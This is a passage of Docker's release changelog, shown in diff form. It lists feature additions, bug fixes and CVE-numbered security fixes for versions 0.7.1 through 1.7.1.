+- Fix error when the docker ps format was not valid. +- Remove redundant ip forward check. +- Fix issue trying to push images to repository mirrors. +- Fix error cleaning up network entrypoints when there is an initialization issue. + +## 1.7.1 (2015-07-14) + +#### Runtime + +- Fix default user spawning exec process with `docker exec` +- Make `--bridge=none` not to configure the network bridge +- Publish networking stats properly +- Fix implicit devicemapper selection with static binaries +- Fix socket connections that hung intermittently +- Fix bridge interface creation on CentOS/RHEL 6.6 +- Fix local dns lookups added to resolv.conf +- Fix copy command mounting volumes +- Fix read/write privileges in volumes mounted with --volumes-from + +#### Remote API + +- Fix unmarshalling of Command and Entrypoint +- Set limit for minimum client version supported +- Validate port specification +- Return proper errors when attach/reattach fail + +#### Distribution + +- Fix pulling private images +- Fix fallback between registry V2 and V1 + +## 1.7.0 (2015-06-16) + +#### Runtime ++ Experimental feature: support for out-of-process volume plugins +* The userland proxy can be disabled in favor of hairpin NAT using the daemon’s `--userland-proxy=false` flag +* The `exec` command supports the `-u|--user` flag to specify the new process owner ++ Default gateway for containers can be specified daemon-wide using the `--default-gateway` and `--default-gateway-v6` flags ++ The CPU CFS (Completely Fair Scheduler) quota can be set in `docker run` using `--cpu-quota` ++ Container block IO can be controlled in `docker run` using`--blkio-weight` ++ ZFS support ++ The `docker logs` command supports a `--since` argument ++ UTS namespace can be shared with the host with `docker run --uts=host` + +#### Quality +* Networking stack was entirely rewritten as part of the libnetwork effort +* Engine internals refactoring +* Volumes code was entirely rewritten to support the plugins effort ++ Sending 
SIGUSR1 to a daemon will dump all goroutines stacks without exiting + +#### Build ++ Support ${variable:-value} and ${variable:+value} syntax for environment variables ++ Support resource management flags `--cgroup-parent`, `--cpu-period`, `--cpu-quota`, `--cpuset-cpus`, `--cpuset-mems` ++ git context changes with branches and directories +* The .dockerignore file support exclusion rules + +#### Distribution ++ Client support for v2 mirroring support for the official registry + +#### Bugfixes +* Firewalld is now supported and will automatically be used when available +* mounting --device recursively + +## 1.6.2 (2015-05-13) + +#### Runtime +- Revert change prohibiting mounting into /sys + +## 1.6.1 (2015-05-07) + +#### Security +- Fix read/write /proc paths (CVE-2015-3630) +- Prohibit VOLUME /proc and VOLUME / (CVE-2015-3631) +- Fix opening of file-descriptor 1 (CVE-2015-3627) +- Fix symlink traversal on container respawn allowing local privilege escalation (CVE-2015-3629) +- Prohibit mount of /sys + +#### Runtime +- Update AppArmor policy to not allow mounts + +## 1.6.0 (2015-04-07) + +#### Builder ++ Building images from an image ID ++ Build containers with resource constraints, ie `docker build --cpu-shares=100 --memory=1024m...` ++ `commit --change` to apply specified Dockerfile instructions while committing the image ++ `import --change` to apply specified Dockerfile instructions while importing the image ++ Builds no longer continue in the background when canceled with CTRL-C + +#### Client ++ Windows Support + +#### Runtime ++ Container and image Labels ++ `--cgroup-parent` for specifying a parent cgroup to place container cgroup within ++ Logging drivers, `json-file`, `syslog`, or `none` ++ Pulling images by ID ++ `--ulimit` to set the ulimit on a container ++ `--default-ulimit` option on the daemon which applies to all created containers (and overwritten by `--ulimit` on run) + +## 1.5.0 (2015-02-10) + +#### Builder ++ Dockerfile to use for a given `docker 
build` can be specified with the `-f` flag +* Dockerfile and .dockerignore files can be themselves excluded as part of the .dockerignore file, thus preventing modifications to these files invalidating ADD or COPY instructions cache +* ADD and COPY instructions accept relative paths +* Dockerfile `FROM scratch` instruction is now interpreted as a no-base specifier +* Improve performance when exposing a large number of ports + +#### Hack ++ Allow client-side only integration tests for Windows +* Include docker-py integration tests against Docker daemon as part of our test suites + +#### Packaging ++ Support for the new version of the registry HTTP API +* Speed up `docker push` for images with a majority of already existing layers +- Fixed contacting a private registry through a proxy + +#### Remote API ++ A new endpoint will stream live container resource metrics and can be accessed with the `docker stats` command ++ Containers can be renamed using the new `rename` endpoint and the associated `docker rename` command +* Container `inspect` endpoint show the ID of `exec` commands running in this container +* Container `inspect` endpoint show the number of times Docker auto-restarted the container +* New types of event can be streamed by the `events` endpoint: ‘OOM’ (container died with out of memory), ‘exec_create’, and ‘exec_start' +- Fixed returned string fields which hold numeric characters incorrectly omitting surrounding double quotes + +#### Runtime ++ Docker daemon has full IPv6 support ++ The `docker run` command can take the `--pid=host` flag to use the host PID namespace, which makes it possible for example to debug host processes using containerized debugging tools ++ The `docker run` command can take the `--read-only` flag to make the container’s root filesystem mounted as readonly, which can be used in combination with volumes to force a container’s processes to only write to locations that will be persisted ++ Container total memory usage can be limited 
for `docker run` using the `--memory-swap` flag +* Major stability improvements for devicemapper storage driver +* Better integration with host system: containers will reflect changes to the host's `/etc/resolv.conf` file when restarted +* Better integration with host system: per-container iptable rules are moved to the DOCKER chain +- Fixed container exiting on out of memory to return an invalid exit code + +#### Other +* The HTTP_PROXY, HTTPS_PROXY, and NO_PROXY environment variables are properly taken into account by the client when connecting to the Docker daemon + +## 1.4.1 (2014-12-15) + +#### Runtime +- Fix issue with volumes-from and bind mounts not being honored after create + +## 1.4.0 (2014-12-11) + +#### Notable Features since 1.3.0 ++ Set key=value labels to the daemon (displayed in `docker info`), applied with + new `-label` daemon flag ++ Add support for `ENV` in Dockerfile of the form: + `ENV name=value name2=value2...` ++ New Overlayfs Storage Driver ++ `docker info` now returns an `ID` and `Name` field ++ Filter events by event name, container, or image ++ `docker cp` now supports copying from container volumes +- Fixed `docker tag`, so it honors `--force` when overriding a tag for existing + image. 
+ +## 1.3.3 (2014-12-11) + +#### Security +- Fix path traversal vulnerability in processing of absolute symbolic links (CVE-2014-9356) +- Fix decompression of xz image archives, preventing privilege escalation (CVE-2014-9357) +- Validate image IDs (CVE-2014-9358) + +#### Runtime +- Fix an issue when image archives are being read slowly + +#### Client +- Fix a regression related to stdin redirection +- Fix a regression with `docker cp` when destination is the current directory + +## 1.3.2 (2014-11-20) + +#### Security +- Fix tar breakout vulnerability +* Extractions are now sandboxed chroot +- Security options are no longer committed to images + +#### Runtime +- Fix deadlock in `docker ps -f exited=1` +- Fix a bug when `--volumes-from` references a container that failed to start + +#### Registry ++ `--insecure-registry` now accepts CIDR notation such as 10.1.0.0/16 +* Private registries whose IPs fall in the 127.0.0.0/8 range do not need the `--insecure-registry` flag +- Skip the experimental registry v2 API when mirroring is enabled + +## 1.3.1 (2014-10-28) + +#### Security +* Prevent fallback to SSL protocols < TLS 1.0 for client, daemon and registry ++ Secure HTTPS connection to registries with certificate verification and without HTTP fallback unless `--insecure-registry` is specified + +#### Runtime +- Fix issue where volumes would not be shared + +#### Client +- Fix issue with `--iptables=false` not automatically setting `--ip-masq=false` +- Fix docker run output to non-TTY stdout + +#### Builder +- Fix escaping `$` for environment variables +- Fix issue with lowercase `onbuild` Dockerfile instruction +- Restrict environment variable expansion to `ENV`, `ADD`, `COPY`, `WORKDIR`, `EXPOSE`, `VOLUME` and `USER` + +## 1.3.0 (2014-10-14) + +#### Notable features since 1.2.0 ++ Docker `exec` allows you to run additional processes inside existing containers ++ Docker `create` gives you the ability to create a container via the CLI without executing a process ++ 
`--security-opts` options to allow user to customize container labels and apparmor profiles ++ Docker `ps` filters +- Wildcard support to COPY/ADD ++ Move production URLs to get.docker.com from get.docker.io ++ Allocate IP address on the bridge inside a valid CIDR ++ Use drone.io for PR and CI testing ++ Ability to setup an official registry mirror ++ Ability to save multiple images with docker `save` + +## 1.2.0 (2014-08-20) + +#### Runtime ++ Make /etc/hosts /etc/resolv.conf and /etc/hostname editable at runtime ++ Auto-restart containers using policies ++ Use /var/lib/docker/tmp for large temporary files ++ `--cap-add` and `--cap-drop` to tweak what linux capability you want ++ `--device` to use devices in containers + +#### Client ++ `docker search` on private registries ++ Add `exited` filter to `docker ps --filter` +* `docker rm -f` now kills instead of stop ++ Support for IPv6 addresses in `--dns` flag + +#### Proxy ++ Proxy instances in separate processes +* Small bug fix on UDP proxy + +## 1.1.2 (2014-07-23) + +#### Runtime ++ Fix port allocation for existing containers ++ Fix containers restart on daemon restart + +#### Packaging ++ Fix /etc/init.d/docker issue on Debian + +## 1.1.1 (2014-07-09) + +#### Builder +* Fix issue with ADD + +## 1.1.0 (2014-07-03) + +#### Notable features since 1.0.1 ++ Add `.dockerignore` support ++ Pause containers during `docker commit` ++ Add `--tail` to `docker logs` + +#### Builder ++ Allow a tar file as context for `docker build` +* Fix issue with white-spaces and multi-lines in `Dockerfiles` + +#### Runtime +* Overall performance improvements +* Allow `/` as source of `docker run -v` +* Fix port allocation +* Fix bug in `docker save` +* Add links information to `docker inspect` + +#### Client +* Improve command line parsing for `docker commit` + +#### Remote API +* Improve status code for the `start` and `stop` endpoints + +## 1.0.1 (2014-06-19) + +#### Notable features since 1.0.0 +* Enhance security for the LXC driver 
+ +#### Builder +* Fix `ONBUILD` instruction passed to grandchildren + +#### Runtime +* Fix events subscription +* Fix /etc/hostname file with host networking +* Allow `-h` and `--net=none` +* Fix issue with hotplug devices in `--privileged` + +#### Client +* Fix artifacts with events +* Fix a panic with empty flags +* Fix `docker cp` on Mac OS X + +#### Miscellaneous +* Fix compilation on Mac OS X +* Fix several races + +## 1.0.0 (2014-06-09) + +#### Notable features since 0.12.0 +* Production support + +## 0.12.0 (2014-06-05) + +#### Notable features since 0.11.0 +* 40+ various improvements to stability, performance and usability +* New `COPY` Dockerfile instruction to allow copying a local file from the context into the container without ever extracting if the file is a tar file +* Inherit file permissions from the host on `ADD` +* New `pause` and `unpause` commands to allow pausing and unpausing of containers using cgroup freezer +* The `images` command has a `-f`/`--filter` option to filter the list of images +* Add `--force-rm` to clean up after a failed build +* Standardize JSON keys in Remote API to CamelCase +* Pull from a docker run now assumes `latest` tag if not specified +* Enhance security on Linux capabilities and device nodes + +## 0.11.1 (2014-05-07) + +#### Registry +- Fix push and pull to private registry + +## 0.11.0 (2014-05-07) + +#### Notable features since 0.10.0 + +* SELinux support for mount and process labels +* Linked containers can be accessed by hostname +* Use the net `--net` flag to allow advanced network configuration such as host networking so that containers can use the host's network interfaces +* Add a ping endpoint to the Remote API to do healthchecks of your docker daemon +* Logs can now be returned with an optional timestamp +* Docker now works with registries that support SHA-512 +* Multiple registry endpoints are supported to allow registry mirrors + +## 0.10.0 (2014-04-08) + +#### Builder +- Fix printing multiple messages 
on a single line. Fixes broken output during builds. +- Follow symlinks inside container's root for ADD build instructions. +- Fix EXPOSE caching. + +#### Documentation +- Add the new options of `docker ps` to the documentation. +- Add the options of `docker restart` to the documentation. +- Update daemon docs and help messages for --iptables and --ip-forward. +- Updated apt-cacher-ng docs example. +- Remove duplicate description of --mtu from docs. +- Add missing -t and -v for `docker images` to the docs. +- Add fixes to the cli docs. +- Update libcontainer docs. +- Update images in docs to remove references to AUFS and LXC. +- Update the nodejs_web_app in the docs to use the new epel RPM address. +- Fix external link on security of containers. +- Update remote API docs. +- Add image size to history docs. +- Be explicit about binding to all interfaces in redis example. +- Document DisableNetwork flag in the 1.10 remote api. +- Document that `--lxc-conf` is lxc only. +- Add chef usage documentation. +- Add example for an image with multiple for `docker load`. +- Explain what `docker run -a` does in the docs. + +#### Contrib +- Add variable for DOCKER_LOGFILE to sysvinit and use append instead of overwrite in opening the logfile. +- Fix init script cgroup mounting workarounds to be more similar to cgroupfs-mount and thus work properly. +- Remove inotifywait hack from the upstart host-integration example because it's not necessary any more. +- Add check-config script to contrib. +- Fix fish shell completion. + +#### Hack +* Clean up "go test" output from "make test" to be much more readable/scannable. +* Exclude more "definitely not unit tested Go source code" directories from hack/make/test. ++ Generate md5 and sha256 hashes when building, and upload them via hack/release.sh. +- Include contributed completions in Ubuntu PPA. ++ Add cli integration tests. +* Add tweaks to the hack scripts to make them simpler. + +#### Remote API ++ Add TLS auth support for API. 
+* Move git clone from daemon to client. +- Fix content-type detection in docker cp. +* Split API into 2 go packages. + +#### Runtime +* Support hairpin NAT without going through Docker server. +- devicemapper: succeed immediately when removing non-existent devices. +- devicemapper: improve handling of devicemapper devices (add per device lock, increase sleep time and unlock while sleeping). +- devicemapper: increase timeout in waitClose to 10 seconds. +- devicemapper: ensure we shut down thin pool cleanly. +- devicemapper: pass info, rather than hash to activateDeviceIfNeeded, deactivateDevice, setInitialized, deleteDevice. +- devicemapper: avoid AB-BA deadlock. +- devicemapper: make shutdown better/faster. +- improve alpha sorting in mflag. +- Remove manual http cookie management because the cookiejar is being used. +- Use BSD raw mode on Darwin. Fixes nano, tmux and others. +- Add FreeBSD support for the client. +- Merge auth package into registry. +- Add deprecation warning for -t on `docker pull`. +- Remove goroutine leak on error. +- Update parseLxcInfo to comply with new lxc1.0 format. +- Fix attach exit on darwin. +- Improve deprecation message. +- Retry to retrieve the layer metadata up to 5 times for `docker pull`. +- Only unshare the mount namespace for execin. +- Merge existing config when committing. +- Disable daemon startup timeout. +- Fix issue #4681: add loopback interface when networking is disabled. +- Add failing test case for issue #4681. +- Send SIGTERM to child, instead of SIGKILL. +- Show the driver and the kernel version in `docker info` even when not in debug mode. +- Always symlink /dev/ptmx for libcontainer. This fixes console related problems. +- Fix issue caused by the absence of /etc/apparmor.d. +- Don't leave empty cidFile behind when failing to create the container. +- Mount cgroups automatically if they're not mounted already. +- Use mock for search tests. +- Update to double-dash everywhere. 
+- Move .dockerenv parsing to lxc driver. +- Move all bind-mounts in the container inside the namespace. +- Don't use separate bind mount for container. +- Always symlink /dev/ptmx for libcontainer. +- Don't kill by pid for other drivers. +- Add initial logging to libcontainer. +* Sort by port in `docker ps`. +- Move networking drivers into runtime top level package. ++ Add --no-prune to `docker rmi`. ++ Add time since exit in `docker ps`. +- graphdriver: add build tags. +- Prevent allocation of previously allocated ports & improve port allocation. +* Add support for --since/--before in `docker ps`. +- Clean up container stop. ++ Add support for configurable dns search domains. +- Add support for relative WORKDIR instructions. +- Add --output flag for docker save. +- Remove duplication of DNS entries in config merging. +- Add cpuset.cpus to cgroups and native driver options. +- Remove docker-ci. +- Promote btrfs. btrfs is no longer considered experimental. +- Add --input flag to `docker load`. +- Return error when existing bridge doesn't match IP address. +- Strip comments before parsing line continuations to avoid interpreting instructions as comments. +- Fix TestOnlyLoopbackExistsWhenUsingDisableNetworkOption to ignore "DOWN" interfaces. +- Add systemd implementation of cgroups and make containers show up as systemd units. +- Fix commit and import when no repository is specified. +- Remount /var/lib/docker as --private to fix scaling issue. +- Use the environment's proxy when pinging the remote registry. +- Reduce error level from harmless errors. +* Allow --volumes-from to be individual files. +- Fix expanding buffer in StdCopy. +- Set error regardless of attach or stdin. This fixes #3364. +- Add support for --env-file to load environment variables from files. +- Symlink /etc/mtab and /proc/mounts. +- Allow pushing a single tag. +- Shut down containers cleanly at shutdown and wait forever for the containers to shut down. 
This makes container shutdown on daemon shutdown work properly via SIGTERM. +- Don't throw error when starting an already running container. +- Fix dynamic port allocation limit. +- remove setupDev from libcontainer. +- Add API version to `docker version`. +- Return correct exit code when receiving signal and make SIGQUIT quit without cleanup. +- Fix --volumes-from mount failure. +- Allow non-privileged containers to create device nodes. +- Skip login tests because of external dependency on a hosted service. +- Deprecate `docker images --tree` and `docker images --viz`. +- Deprecate `docker insert`. +- Include base abstraction for apparmor. This fixes some apparmor related problems on Ubuntu 14.04. +- Add specific error message when hitting 401 over HTTP on push. +- Fix absolute volume check. +- Remove volumes-from from the config. +- Move DNS options to hostconfig. +- Update the apparmor profile for libcontainer. +- Add deprecation notice for `docker commit -run`. + +## 0.9.1 (2014-03-24) + +#### Builder +- Fix printing multiple messages on a single line. Fixes broken output during builds. + +#### Documentation +- Fix external link on security of containers. + +#### Contrib +- Fix init script cgroup mounting workarounds to be more similar to cgroupfs-mount and thus work properly. +- Add variable for DOCKER_LOGFILE to sysvinit and use append instead of overwrite in opening the logfile. + +#### Hack +- Generate md5 and sha256 hashes when building, and upload them via hack/release.sh. + +#### Remote API +- Fix content-type detection in `docker cp`. + +#### Runtime +- Use BSD raw mode on Darwin. Fixes nano, tmux and others. +- Only unshare the mount namespace for execin. +- Retry to retrieve the layer metadata up to 5 times for `docker pull`. +- Merge existing config when committing. +- Fix panic in monitor. +- Disable daemon startup timeout. +- Fix issue #4681: add loopback interface when networking is disabled. +- Add failing test case for issue #4681. 
+- Send SIGTERM to child, instead of SIGKILL. +- Show the driver and the kernel version in `docker info` even when not in debug mode. +- Always symlink /dev/ptmx for libcontainer. This fixes console related problems. +- Fix issue caused by the absence of /etc/apparmor.d. +- Don't leave empty cidFile behind when failing to create the container. +- Improve deprecation message. +- Fix attach exit on darwin. +- devicemapper: improve handling of devicemapper devices (add per device lock, increase sleep time, unlock while sleeping). +- devicemapper: succeed immediately when removing non-existent devices. +- devicemapper: increase timeout in waitClose to 10 seconds. +- Remove goroutine leak on error. +- Update parseLxcInfo to comply with new lxc1.0 format. + +## 0.9.0 (2014-03-10) + +#### Builder +- Avoid extra mount/unmount during build. This fixes mount/unmount related errors during build. +- Add error to docker build --rm. This adds missing error handling. +- Forbid chained onbuild, `onbuild from` and `onbuild maintainer` triggers. +- Make `--rm` the default for `docker build`. + +#### Documentation +- Download the docker client binary for Mac over https. +- Update the titles of the install instructions & descriptions. +* Add instructions for upgrading boot2docker. +* Add port forwarding example in OS X install docs. +- Attempt to disentangle repository and registry. +- Update docs to explain more about `docker ps`. +- Update sshd example to use a Dockerfile. +- Rework some examples, including the Python examples. +- Update docs to include instructions for a container's lifecycle. +- Update docs documentation to discuss the docs branch. +- Don't skip cert check for an example & use HTTPS. +- Bring back the memory and swap accounting section which was lost when the kernel page was removed. +- Explain DNS warnings and how to fix them on systems running and using a local nameserver. + +#### Contrib +- Add Tanglu support for mkimage-debootstrap. 
+- Add SteamOS support for mkimage-debootstrap. + +#### Hack +- Get package coverage when running integration tests. +- Remove the Vagrantfile. This is being replaced with boot2docker. +- Fix tests on systems where aufs isn't available. +- Update packaging instructions and remove the dependency on lxc. + +#### Remote API +* Move code specific to the API to the api package. +- Fix header content type for the API. Makes all endpoints use proper content type. +- Fix registry auth & remove ping calls from CmdPush and CmdPull. +- Add newlines to the JSON stream functions. + +#### Runtime +* Do not ping the registry from the CLI. All requests to registries flow through the daemon. +- Check for nil information return in the lxc driver. This fixes panics with older lxc versions. +- Devicemapper: cleanups and fix for unmount. Fixes two problems which were causing unmount to fail intermittently. +- Devicemapper: remove directory when removing device. Directories don't get left behind when removing the device. +* Devicemapper: enable skip_block_zeroing. Improves performance by not zeroing blocks. +- Devicemapper: fix shutdown warnings. Fixes shutdown warnings concerning pool device removal. +- Ensure docker cp stream is closed properly. Fixes problems with files not being copied by `docker cp`. +- Stop making `tcp://` default to `127.0.0.1:4243` and remove the default port for tcp. +- Fix `--run` in `docker commit`. This makes `docker commit --run` work again. +- Fix custom bridge related options. This makes custom bridges work again. ++ Mount-bind the PTY as container console. This allows tmux/screen to run. ++ Add the pure Go libcontainer library to make it possible to run containers using only features of the Linux kernel. ++ Add native exec driver which uses libcontainer and make it the default exec driver. +- Add support for handling extended attributes in archives. +* Set the container MTU to be the same as the host MTU. 
++ Add simple sha256 checksums for layers to speed up `docker push`. +* Improve kernel version parsing. +* Allow flag grouping (`docker run -it`). +- Remove chroot exec driver. +- Fix divide by zero to fix panic. +- Rewrite `docker rmi`. +- Fix docker info with lxc 1.0.0. +- Fix fedora tty with apparmor. +* Don't always append env vars, replace defaults with vars from config. +* Fix a goroutine leak. +* Switch to Go 1.2.1. +- Fix unique constraint error checks. +* Handle symlinks for Docker's data directory and for TMPDIR. +- Add deprecation warnings for flags (-flag is deprecated in favor of --flag) +- Add apparmor profile for the native execution driver. +* Move system specific code from archive to pkg/system. +- Fix duplicate signal for `docker run -i -t` (issue #3336). +- Return correct process pid for lxc. +- Add a -G option to specify the group which unix sockets belong to. ++ Add `-f` flag to `docker rm` to force removal of running containers. ++ Kill ghost containers and restart all ghost containers when the docker daemon restarts. ++ Add `DOCKER_RAMDISK` environment variable to make Docker work when the root is on a ramdisk. + +## 0.8.1 (2014-02-18) + +#### Builder + +- Avoid extra mount/unmount during build. This removes an unneeded mount/unmount operation which was causing problems with devicemapper +- Fix regression with ADD of tar files. This stops Docker from decompressing tarballs added via ADD from the local file system +- Add error to `docker build --rm`. 
This adds a missing error check to ensure failures to remove containers are detected and reported + +#### Documentation + +* Update issue filing instructions +* Warn against the use of symlinks for Docker's storage folder +* Replace the Firefox example with an IceWeasel example +* Rewrite the PostgreSQL example using a Dockerfile and add more details to it +* Improve the OS X documentation + +#### Remote API + +- Fix broken images API for version less than 1.7 +- Use the right encoding for all API endpoints which return JSON +- Move remote api client to api/ +- Queue calls to the API using generic socket wait + +#### Runtime + +- Fix the use of custom settings for bridges and custom bridges +- Refactor the devicemapper code to avoid many mount/unmount race conditions and failures +- Remove two panics which could make Docker crash in some situations +- Don't ping registry from the CLI client +- Enable skip_block_zeroing for devicemapper. This stops devicemapper from always zeroing entire blocks +- Fix --run in `docker commit`. This makes docker commit store `--run` in the image configuration +- Remove directory when removing devicemapper device. This cleans up leftover mount directories +- Drop NET_ADMIN capability for non-privileged containers. Unprivileged containers can't change their network configuration +- Ensure `docker cp` stream is closed properly +- Avoid extra mount/unmount during container registration. This removes an unneeded mount/unmount operation which was causing problems with devicemapper +- Stop allowing tcp:// as a default tcp bin address which binds to 127.0.0.1:4243 and remove the default port ++ Mount-bind the PTY as container console. This allows tmux and screen to run in a container +- Clean up archive closing. This fixes and improves archive handling +- Fix engine tests on systems where temp directories are symlinked +- Add test methods for save and load +- Avoid temporarily unmounting the container when restarting it. 
This fixes a race for devicemapper during restart +- Support submodules when building from a GitHub repository +- Quote volume path to allow spaces +- Fix remote tar ADD behavior. This fixes a regression which was causing Docker to extract tarballs + +## 0.8.0 (2014-02-04) + +#### Notable features since 0.7.0 + +* Images and containers can be removed much faster +* Building an image from source with docker build is now much faster +* The Docker daemon starts and stops much faster +* The memory footprint of many common operations has been reduced, by streaming files instead of buffering them in memory, fixing memory leaks, and fixing various suboptimal memory allocations +* Several race conditions were fixed, making Docker more stable under very high concurrency load. This makes Docker more stable and less likely to crash and reduces the memory footprint of many common operations +* All packaging operations are now built on the Go language’s standard tar implementation, which is bundled with Docker itself. This makes packaging more portable across host distributions, and solves several issues caused by quirks and incompatibilities between different distributions of tar +* Docker can now create, remove and modify larger numbers of containers and images graciously thanks to more aggressive releasing of system resources. For example the storage driver API now allows Docker to do reference counting on mounts created by the drivers +With the ongoing changes to the networking and execution subsystems of docker testing these areas have been a focus of the refactoring. By moving these subsystems into separate packages we can test, analyze, and monitor coverage and quality of these packages +* Many components have been separated into smaller sub-packages, each with a dedicated test suite. 
As a result the code is better-tested, more readable and easier to change + +* The ADD instruction now supports caching, which avoids unnecessarily re-uploading the same source content again and again when it hasn’t changed +* The new ONBUILD instruction adds to your image a “trigger” instruction to be executed at a later time, when the image is used as the base for another build +* Docker now ships with an experimental storage driver which uses the BTRFS filesystem for copy-on-write +* Docker is officially supported on Mac OS X +* The Docker daemon supports systemd socket activation + +## 0.7.6 (2014-01-14) + +#### Builder + +* Do not follow symlink outside of build context + +#### Runtime + +- Remount bind mounts when ro is specified +* Use https for fetching docker version + +#### Other + +* Inline the test.docker.io fingerprint +* Add ca-certificates to packaging documentation + +## 0.7.5 (2014-01-09) + +#### Builder + +* Disable compression for build. More space usage but a much faster upload +- Fix ADD caching for certain paths +- Do not compress archive from git build + +#### Documentation + +- Fix error in GROUP add example +* Make sure the GPG fingerprint is inline in the documentation +* Give more specific advice on setting up signing of commits for DCO + +#### Runtime + +- Fix misspelled container names +- Do not add hostname when networking is disabled +* Return most recent image from the cache by date +- Return all errors from docker wait +* Add Content-Type Header "application/json" to GET /version and /info responses + +#### Other + +* Update DCO to version 1.1 ++ Update Makefile to use "docker:GIT_BRANCH" as the generated image name +* Update Travis to check for new 1.1 DCO version + +## 0.7.4 (2014-01-07) + +#### Builder + +- Fix ADD caching issue with . 
prefixed path +- Fix docker build on devicemapper by reverting sparse file tar option +- Fix issue with file caching and prevent wrong cache hit +* Use same error handling while unmarshalling CMD and ENTRYPOINT + +#### Documentation + +* Simplify and streamline Amazon Quickstart +* Install instructions use unprefixed Fedora image +* Update instructions for mtu flag for Docker on GCE ++ Add Ubuntu Saucy to installation +- Fix for wrong version warning on master instead of latest + +#### Runtime + +- Only get the image's rootfs when we need to calculate the image size +- Correctly handle unmapping UDP ports +* Make CopyFileWithTar use a pipe instead of a buffer to save memory on docker build +- Fix login message to say pull instead of push +- Fix "docker load" help by removing "SOURCE" prompt and mentioning STDIN +* Make blank -H option default to the same as no -H was sent +* Extract cgroups utilities to own submodule + +#### Other + ++ Add Travis CI configuration to validate DCO and gofmt requirements ++ Add Developer Certificate of Origin Text +* Upgrade VBox Guest Additions +* Check standalone header when pinging a registry server + +## 0.7.3 (2014-01-02) + +#### Builder + ++ Update ADD to use the image cache, based on a hash of the added content +* Add error message for empty Dockerfile + +#### Documentation + +- Fix outdated link to the "Introduction" on www.docker.io ++ Update the docs to get wider when the screen does +- Add information about needing to install LXC when using raw binaries +* Update Fedora documentation to disentangle the docker and docker.io conflict +* Add a note about using the new `-mtu` flag in several GCE zones ++ Add FrugalWare installation instructions ++ Add a more complete example of `docker run` +- Fix API documentation for creating and starting Privileged containers +- Add missing "name" parameter documentation on "/containers/create" +* Add a mention of `lxc-checkconfig` as a way to check for some of the necessary kernel 
configuration +- Update the 1.8 API documentation with some additions that were added to the docs for 1.7 + +#### Hack + +- Add missing libdevmapper dependency to the packagers documentation +* Update minimum Go requirement to a hard line at Go 1.2+ +* Many minor improvements to the Vagrantfile ++ Add ability to customize dockerinit search locations when compiling (to be used very sparingly only by packagers of platforms who require a nonstandard location) ++ Add coverprofile generation reporting +- Add `-a` to our Go build flags, removing the need for recompiling the stdlib manually +* Update Dockerfile to be more canonical and have less spurious warnings during build +- Fix some miscellaneous `docker pull` progress bar display issues +* Migrate more miscellaneous packages under the "pkg" folder +* Update TextMate highlighting to automatically be enabled for files named "Dockerfile" +* Reorganize syntax highlighting files under a common "contrib/syntax" directory +* Update install.sh script (https://get.docker.io/) to not fail if busybox fails to download or run at the end of the Ubuntu/Debian installation +* Add support for container names in bash completion + +#### Packaging + ++ Add an official Docker client binary for Darwin (Mac OS X) +* Remove empty "Vendor" string and added "License" on deb package ++ Add a stubbed version of "/etc/default/docker" in the deb package + +#### Runtime + +* Update layer application to extract tars in place, avoiding file churn while handling whiteouts +- Fix permissiveness of mtime comparisons in tar handling (since GNU tar and Go tar do not yet support sub-second mtime precision) +* Reimplement `docker top` in pure Go to work more consistently, and even inside Docker-in-Docker (thus removing the shell injection vulnerability present in some versions of `lxc-ps`) ++ Update `-H unix://` to work similarly to `-H tcp://` by inserting the default values for missing portions +- Fix more edge cases regarding dockerinit and deleted or 
replaced docker or dockerinit files +* Update container name validation to include '.' +- Fix use of a symlink or non-absolute path as the argument to `-g` to work as expected +* Update to handle external mounts outside of LXC, fixing many small mounting quirks and making future execution backends and other features simpler +* Update to use proper box-drawing characters everywhere in `docker images -tree` +* Move MTU setting from LXC configuration to directly use netlink +* Add `-S` option to external tar invocation for more efficient spare file handling ++ Add arch/os info to User-Agent string, especially for registry requests ++ Add `-mtu` option to Docker daemon for configuring MTU +- Fix `docker build` to exit with a non-zero exit code on error ++ Add `DOCKER_HOST` environment variable to configure the client `-H` flag without specifying it manually for every invocation + +## 0.7.2 (2013-12-16) + +#### Runtime + ++ Validate container names on creation with standard regex +* Increase maximum image depth to 127 from 42 +* Continue to move api endpoints to the job api ++ Add -bip flag to allow specification of dynamic bridge IP via CIDR +- Allow bridge creation when ipv6 is not enabled on certain systems +* Set hostname and IP address from within dockerinit +* Drop capabilities from within dockerinit +- Fix volumes on host when symlink is present the image +- Prevent deletion of image if ANY container is depending on it even if the container is not running +* Update docker push to use new progress display +* Use os.Lstat to allow mounting unix sockets when inspecting volumes +- Adjust handling of inactive user login +- Add missing defines in devicemapper for older kernels +- Allow untag operations with no container validation +- Add auth config to docker build + +#### Documentation + +* Add more information about Docker logging ++ Add RHEL documentation +* Add a direct example for changing the CMD that is run in a container +* Update Arch installation 
documentation ++ Add section on Trusted Builds ++ Add Network documentation page + +#### Other + ++ Add new cover bundle for providing code coverage reporting +* Separate integration tests in bundles +* Make Tianon the hack maintainer +* Update mkimage-debootstrap with more tweaks for keeping images small +* Use https to get the install script +* Remove vendored dotcloud/tar now that Go 1.2 has been released + +## 0.7.1 (2013-12-05) + +#### Documentation + ++ Add @SvenDowideit as documentation maintainer ++ Add links example ++ Add documentation regarding ambassador pattern ++ Add Google Cloud Platform docs ++ Add dockerfile best practices +* Update doc for RHEL +* Update doc for registry +* Update Postgres examples +* Update doc for Ubuntu install +* Improve remote api doc + +#### Runtime + ++ Add hostconfig to docker inspect ++ Implement `docker log -f` to stream logs ++ Add env variable to disable kernel version warning ++ Add -format to `docker inspect` ++ Support bind-mount for files +- Fix bridge creation on RHEL +- Fix image size calculation +- Make sure iptables are called even if the bridge already exists +- Fix issue with stderr only attach +- Remove init layer when destroying a container +- Fix same port binding on different interfaces +- `docker build` now returns the correct exit code +- Fix `docker port` to display correct port +- `docker build` now check that the dockerfile exists client side +- `docker attach` now returns the correct exit code +- Remove the name entry when the container does not exist + +#### Registry + +* Improve progress bars, add ETA for downloads +* Simultaneous pulls now waits for the first to finish instead of failing +- Tag only the top-layer image when pushing to registry +- Fix issue with offline image transfer +- Fix issue preventing using ':' in password for registry + +#### Other + ++ Add pprof handler for debug ++ Create a Makefile +* Use stdlib tar that now includes fix +* Improve make.sh test script +* Handle SIGQUIT 
